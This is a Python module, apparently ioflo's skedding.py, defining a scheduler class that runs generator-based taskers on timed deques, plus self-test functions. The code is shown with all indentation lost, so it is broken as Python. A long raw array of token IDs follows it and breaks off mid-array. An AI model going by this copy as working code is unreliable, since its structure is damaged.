#print( "module {0}".format(__name__))
import sys
import os
import time
from collections import deque
from ..aid.consoling import getConsole
console = getConsole()
from ..aid.sixing import *
from ..aid import odict, oset
from .globaling import *
from ..aid import timing
from . import excepting
from . import registering
from . import storing
from . import tasking
from . import building
from ..__metadata__ import __version__
from ..aid.consoling import getConsole
console = getConsole()
class Skedder(object):
"""Schedules weightless tasker objects based on generators.
run method runs the skedder main loop until interrupted or all taskers
completed
taskers is a dictionary of taskers indexed by tasker name
The skedder maintains lists of taskers in various execution states
Each list determines what the skedder does with the tasker.
The skedder has methods that move taskers between the lists and
also notifies taskers of their control
Skedder runs tasker and sends it a control
Tasker runs using control and yields its status
Each tasker as a .desire attribute that indicates what the next
desired control should be.
Each tasker as a .period attribute that indicates how ofter the tasker
should be run
There are three deques the skedder maintains. Each entry in each deque
is a tuple (tasker, retime, period)
tasker is reference to tasker object
retime is time that the tasker should next be run
a retime of zero means runs asap or always
period is the time period between runs
ready = deque of tuples where taskers are ready to be run
If need different priorities then need to add a
ready list for each priority
stopped = deque of tuples where taskers stopped awaiting start
aborted = deque of tuples where taskers aborted can't be restarted
addStoppedTask(tasker) adds tasker to stopped list
addReadyTask(tasker) adds tasker to ready list
Everytime a tasker runs it yields a status that the skedder uses to determine
what to do with the tasker
instance attributes:
.name = skedder name string
.period = time seconds between iterations of skedder
.stamp = current iteration time of skedder
.real = real time IF True ELSE simulated time
.timer = timer to time loops in real time
.elapsed = timer to time elapsed in mission
.houses = list of houses to be scheduled
.ready = deque of tasker tuples ready to run
.aborted = deque of tasker tuples aborted
"""
def __init__( self,
name="skedder",
period=0.125,
stamp=0.0,
real=False,
retro=True,
filepath='',
behaviors=None,
username='',
password='',
mode=None,
houses=None,
metas=None,
preloads=None, ):
"""
Initialize Skedder instance.
parameters:
name = name string
period = iteration period
stamp = initial time stamp value
real = time mode real time True or simulated time False
retro = shift timers if retrograded system clock detected
filepath = filepath to build file
behaviors = list of pathnames to packages with external behavior modules
username = username
password = password
mode = parsing mode
houses = list of houses
metas = list of triples of (name, path, data) where
name = name string of house attribute, path = path string, data = odict
preloads = list of duples of (path, data) to preload Store where
path = path string, data = odict
"""
self.name = name
self.period = float(abs(period))
self.stamp = float(abs(stamp))
#real time or sim time mode
self.real = True if real else False
self.timer = timing.MonoTimer(duration = self.period, retro=retro)
self.elapsed = timing.MonoTimer(retro=retro)
self.filepath = os.path.abspath(filepath)
self.plan = os.path.split(self.filepath)[1]
self.behaviors = behaviors or []
self.username = username
self.password = password
self.mode = mode or []
self.houses = houses or []
#Meta data format is list of triples of form (name, path, value)
self.metas = [
("name", "meta.name", odict(value=self.name)),
("period", "meta.period", odict(value=self.period)),
("real", "meta.real", odict(value=self.real)),
("mode", "meta.mode", odict(value=self.mode)), #applied mode logging only
("plan", "meta.plan", odict(value=self.plan)),
("filepath", "meta.filepath", odict(value=self.filepath)),
("behaviors", "meta.behaviors", odict(value=self.behaviors)),
("credentials", "meta.credentials",
odict([('username', self.username), ('password', self.password)])),
("failure", "meta.failure", odict(value="")), # for failure reporting
("framers", "meta.framers", odict()), # for failure reporting
("taskables", "meta.taskables", odict(value=oset())), # to add taskables at runtime ordered
]
if metas:
self.metas.extend(metas)
self.preloads = [
("ioflo.version", odict(value=__version__)),
("ioflo.platform",
odict([("os", sys.platform),
("python", "{0}.{1}.{2}".format(*sys.version_info)),] )),
]
if preloads:
self.preloads.extend(preloads)
self.ready = deque() # deque of taskers in run order
self.aborted = deque() # deque of aborted taskers
self.built = False # True when successfully built
def addReadyTask(self, tasker):
"""
Prepare tasker to be started and add to ready list
"""
if tasker.schedule == ACTIVE:
tasker.desire = START
else:
tasker.desire = STOP
tasker.status = STOPPED
retime = tasker.store.stamp
period = tasker.period
trp = (tasker, retime, period)
self.ready.append(trp)
console.profuse(" Add ready: {0} retime: {1} period: {2} desire {3}\n".format(
tasker.name, retime, period, ControlNames[tasker.desire]))
def build(self, filepath='', mode=None, metas=None, preloads=None):
""" Build houses from file given by filepath """
console.terse("Building Houses for Skedder '{0}' ...\n".format(self.name))
self.built = False
#use parameter otherwise use inited value
if filepath:
self.filepath = filepath
if mode:
self.mode.extend(mode)
if metas:
self.metas.extend(metas)
if preloads:
self.preloads.extend(preloads)
b = building.Builder(fileName = self.filepath,
mode=self.mode,
metas = self.metas,
preloads =self.preloads,
behaviors=self.behaviors)
if not b.build():
return False
self.built = True
self.houses = b.houses
for house in self.houses:
console.profuse("Meta Data for House '{0}':\n{1}\n".format(
house.name, house.metas))
return True
def run(self, growable=False):
"""runs all generator taskers in running list by calling next() method.
Keyboard interrupt (cntl-c) to end forever loop
Since finally clause closes taskers they must be restarted before
run can be executed again
if growable is True then allow adding new taskers at runtime
via house metas['taskables']
"""
console.terse("Starting Skedder '{0}' ...\n".format(self.name))
stamp = self.stamp
for house in self.houses:
house.store.changeStamp(stamp)
("Initialized store {0}: stamp = {1} with {2}\n".format(
house.store.name, house.store.stamp, stamp))
for tasker in house.taskables:
self.addReadyTask(tasker)
console.profuse("Ready Taskers: {0}\n".format(
', '.join([tasker.name for tasker,r,p in self.ready])))
console.profuse("Aborted Taskers: {0}\n".format(
', '.join([tasker.name for tasker,r,p in self.aborted])))
self.timer.restart()
self.elapsed.restart()
#make local reference for speed put out side loop?
ready = self.ready
#stopped = self.stopped
aborted = self.aborted
try: #so always clean up resources if exception
while True:
try: #CNTL-C generates keyboardInterrupt to break out of while loop
console.profuse("\nRunning Skedder '{0}' at stamp = {1} real elapsed = {2:0.4f}\n".format(
self.name, self.stamp, self.elapsed.elapsed))
more = False #are any taskers RUNNING or STARTED
for i in range(len(ready)): #attempt to run each ready tasker
tasker, retime, period = ready.popleft() #pop it off
if retime > stamp: #not time yet
ready.append((tasker, retime, period)) #reappend it
status = tasker.status
else: #run it
try:
status = tasker.runner.send(tasker.desire)
if status == ABORTED: #aborted so abort tasker
aborted.append((tasker, stamp, period))
console.profuse(" Tasker Self Aborted: {0}\n".format(tasker.name))
else:
ready.append((tasker,
retime + tasker.period,
tasker.period)) # append allows for period change
except StopIteration: #generator returned instead of yielded
aborted.append((tasker, stamp, period))
console.profuse(" Tasker Aborted due to StopIteration: {0}\n".format(tasker.name))
if status == RUNNING or status == STARTED:
more = True
if growable:
# todo from each house.metas fetch new taskables
# add to ready
pass
if not ready: #no pending taskers so done
console.terse("No ready taskers. Shutting down skedder ...\n")
break
if not more: #all taskers stopped or aborted
console.terse("No running or started taskers. Shutting down skedder ...\n")
break
#update time stamps
if self.real:
console.profuse(" Time remaining skedder = {0:0.4f}\n".format(self.timer.remaining))
while not self.timer.expired:
time.sleep(self.timer.remaining)
self.timer.repeat()
self.stamp += self.period
stamp = self.stamp
for house in self.houses:
house.store.changeStamp(stamp)
except KeyboardInterrupt: #CNTL-C shutdown skedder
console.terse("KeyboardInterrupt forcing shutdown of Skedder ...\n")
break
except SystemExit: #User know why shutting down
console.terse("SystemExit forcing shutdown of Skedder ...\n")
raise
except Exception: #Let user know what exception caused shutdoen
console.terse("Surprise exception forcing shutdown of Skedder ...\n")
raise
console.terse("Total elapsed real time = {0:0.4f}\n".format(self.elapsed.elapsed))
finally: #finally clause always runs regardless of exception or not
#Abort any running taskers to reclaim resources
#Stopped or aborted taskers should have already released resources
#if last run tasker exited due to exception then try finally clause in
#its generator is responsible for releasing resources
console.terse("Aborting all ready Taskers ...\n")
for i in range(len(ready)): #run each ready tasker once
tasker,retime,period = ready.popleft() #pop it off
try:
status = tasker.runner.send(ABORT)
console.terse("Tasker '{0}' aborted\n".format(tasker.name))
except StopIteration: #generator returned instead of yielded
console.terse("Tasker '{0}' generator already exited\n".format(tasker.name))
#tasker.runner.close() #kill generator
if console._verbosity >= console.Wordage.concise:
for house in self.houses:
#show store hierarchy
console.concise( "\nData Store for {0}\n".format(house.name))
house.store.expose(valued=(console._verbosity >= console.Wordage.terse))
def Test(real = False, verbose = False):
"""Module Common self test
"""
import housing
reload(housing)
housing.ClearRegistries()
print(housing.Registries)
print("")
print(housing.Registries["tasker"].Names)
print(housing.Registries["tasker"].Counter)
print("")
house = housing.House()
t1 = tasking.Tasker(name = 't1', store = house.store)
t2 = tasking.Tasker(name = 't2', store = house.store)
t3 = tasking.Tasker(name = 't3', store = house.store, period = 0.125)
t4 = tasking.Tasker(name = 't4', store = house.store, period = 0.125)
t5 = tasking.Tasker(name = 't5', store = house.store, period = 0.5)
t6 = tasking.Tasker(name = 't6', store = house.store, period = 1.0)
house.actives = [t1,t6,t2,t5,t3,t4]
skedder = Skedder(name = "TestTasker", period = 0.125, real = real, houses = [house])
skedder.run()
def TestProfile(real = False, verbose = False):
"""Module Common self test
"""
import cProfile
import pstats
import housing
reload(housing)
housing.ClearRegistries()
print(housing.Registries)
print("")
print(housing.Registries["tasker"].Names)
print(housing.Registries["tasker"].Counter)
print("")
house = housing.House()
t1 = Tasker(name = 't1', store = house.store)
t2 = Tasker(name = 't2', store = house.store)
t3 = Tasker(name = 't3', store = house.store, period = 0.125)
t4 = Tasker(name = 't4', store = house.store, period = 0.125)
t5 = Tasker(name = 't5', store = house.store, period = 0.5)
t6 = Tasker(name = 't6', store = house.store, period = 1.0)
house.actives = [t1,t6,t2,t5,t3,t4]
skedder = Skedder(name = "TestSkedder", period = 0.125, real = real, houses = [house])
#skedder.run()
cProfile.runctx('skedder.run()',globals(),locals(), './test/profiles/skeddertest')
p = pstats.Stats('./test/profiles/skeddertest')
p.sort_stats('time').print_stats()
p.print_callers()
p.print_callees()
if __name__ == "__main__":
Test()
| [
37811,
8135,
6048,
278,
13,
9078,
3463,
1203,
4704,
26925,
628,
198,
37811,
198,
2,
4798,
7,
366,
21412,
1391,
15,
92,
1911,
18982,
7,
834,
3672,
834,
4008,
198,
198,
11748,
25064,
198,
198,
11748,
28686,
198,
11748,
640,
198,
6738,
17268,
1330,
390,
4188,
198,
198,
6738,
11485,
1698,
13,
5936,
40949,
1330,
651,
47581,
198,
41947,
796,
651,
47581,
3419,
198,
198,
6738,
11485,
1698,
13,
19412,
278,
1330,
1635,
198,
6738,
11485,
1698,
1330,
267,
11600,
11,
267,
2617,
198,
6738,
764,
20541,
278,
1330,
1635,
198,
198,
6738,
11485,
1698,
1330,
10576,
198,
6738,
764,
1330,
2845,
278,
198,
6738,
764,
1330,
28336,
198,
6738,
764,
1330,
23069,
198,
6738,
764,
1330,
4876,
278,
198,
6738,
764,
1330,
2615,
198,
198,
6738,
11485,
834,
38993,
834,
1330,
11593,
9641,
834,
198,
198,
6738,
11485,
1698,
13,
5936,
40949,
1330,
651,
47581,
198,
41947,
796,
651,
47581,
3419,
628,
198,
4871,
3661,
276,
1082,
7,
15252,
2599,
198,
220,
220,
220,
37227,
50,
1740,
5028,
3463,
1203,
4876,
263,
5563,
1912,
319,
27298,
13,
628,
220,
220,
220,
220,
220,
220,
1057,
2446,
4539,
262,
1341,
276,
1082,
1388,
9052,
1566,
19072,
393,
477,
4876,
364,
198,
220,
220,
220,
220,
220,
220,
5668,
628,
220,
220,
220,
220,
220,
220,
4876,
364,
318,
257,
22155,
286,
4876,
364,
41497,
416,
4876,
263,
1438,
628,
220,
220,
220,
220,
220,
220,
383,
1341,
276,
1082,
16047,
8341,
286,
4876,
364,
287,
2972,
9706,
2585,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5501,
1351,
15947,
644,
262,
1341,
276,
1082,
857,
351,
262,
4876,
263,
13,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
383,
1341,
276,
1082,
468,
5050,
326,
1445,
4876,
364,
1022,
262,
8341,
290,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
635,
407,
6945,
4876,
364,
286,
511,
1630,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3661,
276,
1082,
4539,
4876,
263,
290,
12800,
340,
257,
1630,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15941,
263,
4539,
1262,
1630,
290,
19299,
663,
3722,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5501,
4876,
263,
355,
257,
764,
8906,
557,
11688,
326,
9217,
644,
262,
1306,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
10348,
1630,
815,
307,
13,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5501,
4876,
263,
355,
257,
764,
41007,
11688,
326,
9217,
703,
286,
353,
262,
4876,
263,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
815,
307,
1057,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1318,
389,
1115,
390,
13281,
262,
1341,
276,
1082,
16047,
13,
5501,
5726,
287,
1123,
390,
4188,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
318,
257,
46545,
357,
35943,
263,
11,
1005,
524,
11,
2278,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4876,
263,
318,
4941,
284,
4876,
263,
2134,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1005,
524,
318,
640,
326,
262,
4876,
263,
815,
1306,
307,
1057,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
257,
1005,
524,
286,
6632,
1724,
4539,
355,
499,
393,
1464,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2278,
318,
262,
640,
2278,
1022,
4539,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3492,
796,
390,
4188,
286,
12777,
2374,
810,
4876,
364,
389,
3492,
284,
307,
1057,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1002,
761,
1180,
15369,
788,
761,
284,
751,
257,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3492,
1351,
329,
1123,
8475,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5025,
796,
390,
4188,
286,
12777,
2374,
810,
4876,
364,
5025,
21859,
923,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
46847,
796,
390,
4188,
286,
12777,
2374,
810,
4876,
364,
46847,
460,
470,
307,
15765,
276,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
751,
1273,
38333,
25714,
7,
35943,
263,
8,
6673,
4876,
263,
284,
5025,
1351,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
751,
35474,
25714,
7,
35943,
263,
8,
6673,
4876,
263,
284,
3492,
1351,
628,
220,
220,
220,
220,
220,
220,
3887,
2435,
257,
4876,
263,
4539,
340,
19299,
257,
3722,
326,
262,
1341,
276,
1082,
3544,
284,
5004,
198,
220,
220,
220,
220,
220,
220,
644,
284,
466,
351,
262,
4876,
263,
628,
220,
220,
220,
220,
220,
220,
4554,
12608,
25,
198,
220,
220,
220,
220,
220,
220,
764,
3672,
796,
1341,
276,
1082,
1438,
4731,
198,
220,
220,
220,
220,
220,
220,
764,
41007,
796,
640,
4201,
1022,
34820,
286,
1341,
276,
1082,
198,
220,
220,
220,
220,
220,
220,
764,
301,
696,
796,
1459,
24415,
640,
286,
1341,
276,
1082,
198,
220,
220,
220,
220,
220,
220,
764,
5305,
796,
1103,
640,
16876,
6407,
17852,
5188,
28590,
640,
198,
220,
220,
220,
220,
220,
220,
764,
45016,
796,
19781,
284,
640,
23607,
287,
1103,
640,
198,
220,
220,
220,
220,
220,
220,
764,
417,
28361,
796,
19781,
284,
640,
42118,
287,
4365,
628,
220,
220,
220,
220,
220,
220,
764,
20089,
796,
1351,
286,
7777,
284,
307,
7530,
628,
220,
220,
220,
220,
220,
220,
764,
1493,
796,
390,
4188,
286,
4876,
263,
220,
12777,
2374,
3492,
284,
1057,
198,
220,
220,
220,
220,
220,
220,
764,
397,
9741,
796,
390,
4188,
286,
4876,
263,
12777,
2374,
46847,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
825,
11593,
15003,
834,
7,
220,
2116,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1438,
2625,
8135,
276,
1082,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2278,
28,
15,
13,
11623,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
17977,
28,
15,
13,
15,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1103,
28,
25101,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
12175,
28,
17821,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2393,
6978,
11639,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
14301,
28,
14202,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
20579,
11639,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
9206,
11639,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4235,
28,
14202,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
7777,
28,
14202,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1138,
292,
28,
14202,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
662,
46030,
28,
14202,
11,
15179,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
20768,
1096,
3661,
276,
1082,
4554,
13,
198,
220,
220,
220,
220,
220,
220,
220,
10007,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1438,
796,
1438,
4731,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2278,
796,
24415,
2278,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
17977,
796,
4238,
640,
17977,
1988,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1103,
796,
640,
4235,
1103,
640,
6407,
393,
28590,
640,
10352,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
12175,
796,
6482,
48085,
611,
12175,
21791,
1080,
8801,
12326,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2393,
6978,
796,
2393,
6978,
284,
1382,
2393,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
14301,
796,
1351,
286,
3108,
14933,
284,
10392,
351,
7097,
4069,
13103,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
20579,
796,
20579,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
9206,
796,
9206,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4235,
796,
32096,
4235,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
7777,
796,
1351,
286,
7777,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1138,
292,
796,
1351,
286,
1333,
2374,
286,
357,
3672,
11,
3108,
11,
1366,
8,
810,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1438,
796,
1438,
4731,
286,
2156,
11688,
11,
3108,
796,
3108,
4731,
11,
1366,
796,
267,
11600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
662,
46030,
796,
1351,
286,
7043,
2374,
286,
357,
6978,
11,
1366,
8,
284,
662,
2220,
9363,
810,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3108,
796,
3108,
4731,
11,
1366,
796,
267,
11600,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
3672,
796,
1438,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
41007,
796,
12178,
7,
8937,
7,
41007,
4008,
628,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
301,
696,
796,
12178,
7,
8937,
7,
301,
696,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
5305,
640,
393,
985,
640,
4235,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
5305,
796,
6407,
611,
1103,
2073,
10352,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
45016,
796,
10576,
13,
9069,
78,
48801,
7,
32257,
796,
2116,
13,
41007,
11,
12175,
28,
1186,
305,
8,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
417,
28361,
796,
10576,
13,
9069,
78,
48801,
7,
1186,
305,
28,
1186,
305,
8,
628,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
7753,
6978,
796,
28686,
13,
6978,
13,
397,
2777,
776,
7,
7753,
6978,
8,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11578,
796,
28686,
13,
6978,
13,
35312,
7,
944,
13,
7753,
6978,
38381,
16,
60,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
20709,
615,
12706,
796,
14301,
393,
17635,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
29460,
796,
20579,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
28712,
796,
9206,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
14171,
796,
4235,
393,
17635,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
20089,
796,
7777,
393,
17635,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
48526,
1366,
5794,
318,
1351,
286,
1333,
2374,
286,
1296,
357,
3672,
11,
3108,
11,
1988,
8,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
4164,
292,
796,
685,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5855,
3672,
1600,
366,
28961,
13,
3672,
1600,
267,
11600,
7,
8367,
28,
944,
13,
3672,
36911,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5855,
41007,
1600,
366,
28961,
13,
41007,
1600,
267,
11600,
7,
8367,
28,
944,
13,
41007,
36911,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5855,
5305,
1600,
366,
28961,
13,
5305,
1600,
267,
11600,
7,
8367,
28,
944,
13,
5305,
36911,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5855,
14171,
1600,
366,
28961,
13,
14171,
1600,
267,
11600,
7,
8367,
28,
944,
13,
14171,
36911,
1303,
1324,
18511,
4235,
18931,
691,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5855,
11578,
1600,
366,
28961,
13,
11578,
1600,
267,
11600,
7,
8367,
28,
944,
13,
11578,
36911,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5855,
7753,
6978,
1600,
366,
28961,
13,
7753,
6978,
1600,
267,
11600,
7,
8367,
28,
944,
13,
7753,
6978,
36911,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5855,
20709,
615,
12706,
1600,
366,
28961,
13,
20709,
615,
12706,
1600,
267,
11600,
7,
8367,
28,
944,
13,
20709,
615,
12706,
36911,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5855,
66,
445,
14817,
1600,
366,
28961,
13,
66,
445,
14817,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
267,
11600,
26933,
10786,
29460,
3256,
2116,
13,
29460,
828,
19203,
28712,
3256,
2116,
13,
28712,
8,
12962,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5855,
32165,
495,
1600,
366,
28961,
13,
32165,
495,
1600,
267,
11600,
7,
8367,
2625,
4943,
828,
1303,
329,
5287,
6447,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5855,
19298,
364,
1600,
366,
28961,
13,
19298,
364,
1600,
267,
11600,
3419,
828,
1303,
329,
5287,
6447,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5855,
35943,
2977,
1600,
366,
28961,
13,
35943,
2977,
1600,
267,
11600,
7,
8367,
28,
418,
316,
28955,
828,
1303,
284,
751,
4876,
2977,
379,
19124,
6149,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2361,
198,
220,
220,
220,
220,
220,
220,
220,
611,
1138,
292,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
4164,
292,
13,
2302,
437,
7,
4164,
292,
8,
628,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
3866,
46030,
796,
685,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5855,
952,
48679,
13,
9641,
1600,
267,
11600,
7,
8367,
28,
834,
9641,
834,
36911,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5855,
952,
48679,
13,
24254,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
267,
11600,
26933,
7203,
418,
1600,
25064,
13,
24254,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5855,
29412,
1600,
45144,
15,
27422,
90,
16,
27422,
90,
17,
92,
1911,
18982,
46491,
17597,
13,
9641,
62,
10951,
36911,
60,
1267,
828,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2361,
198,
220,
220,
220,
220,
220,
220,
220,
611,
662,
46030,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
3866,
46030,
13,
2302,
437,
7,
3866,
46030,
8,
628,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
1493,
796,
390,
4188,
3419,
1303,
390,
4188,
286,
4876,
364,
287,
1057,
1502,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
397,
9741,
796,
390,
4188,
3419,
1303,
390,
4188,
286,
46847,
4876,
364,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
18780,
796,
10352,
220,
1303,
6407,
618,
7675,
3170,
628,
220,
220,
220,
825,
751,
35474,
25714,
7,
944,
11,
4876,
263,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
43426,
4876,
263,
284,
307,
2067,
290,
751,
284,
3492,
1351,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
611,
4876,
263,
13,
15952,
5950,
6624,
11741,
9306,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4876,
263,
13,
8906,
557,
796,
33303,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4876,
263,
13,
8906,
557,
796,
44934,
198,
220,
220,
220,
220,
220,
220,
220,
4876,
263,
13,
13376,
796,
44934,
47,
1961,
198,
220,
220,
220,
220,
220,
220,
220,
1005,
524,
796,
4876,
263,
13,
8095,
13,
301,
696,
198,
220,
220,
220,
220,
220,
220,
220,
2278,
796,
4876,
263,
13,
41007,
198,
220,
220,
220,
220,
220,
220,
220,
491,
79,
796,
357,
35943,
263,
11,
1005,
524,
11,
2278,
8,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
1493,
13,
33295,
7,
2213,
79,
8,
198,
220,
220,
220,
220,
220,
220,
220,
8624,
13,
5577,
1904,
7203,
220,
220,
220,
220,
3060,
3492,
25,
1391,
15,
92,
1005,
524,
25,
1391,
16,
92,
2278,
25,
1391,
17,
92,
6227,
1391,
18,
32239,
77,
1911,
18982,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4876,
263,
13,
3672,
11,
1005,
524,
11,
2278,
11,
6779,
36690,
58,
35943,
263,
13,
8906,
557,
60,
4008,
628,
220,
220,
220,
825,
1382,
7,
944,
11,
2393,
6978,
11639,
3256,
4235,
28,
14202,
11,
1138,
292,
28,
14202,
11,
662,
46030,
28,
14202,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
10934,
7777,
422,
2393,
1813,
416,
2393,
6978,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
8624,
13,
353,
325,
7203,
25954,
34336,
329,
3661,
276,
1082,
705,
90,
15,
92,
6,
2644,
59,
77,
1911,
18982,
7,
944,
13,
3672,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
18780,
796,
10352,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
1904,
11507,
4306,
779,
287,
863,
1988,
198,
220,
220,
220,
220,
220,
220,
220,
611,
2393,
6978,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
7753,
6978,
796,
2393,
6978,
198,
220,
220,
220,
220,
220,
220,
220,
611,
4235,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
14171,
13,
2302,
437,
7,
14171,
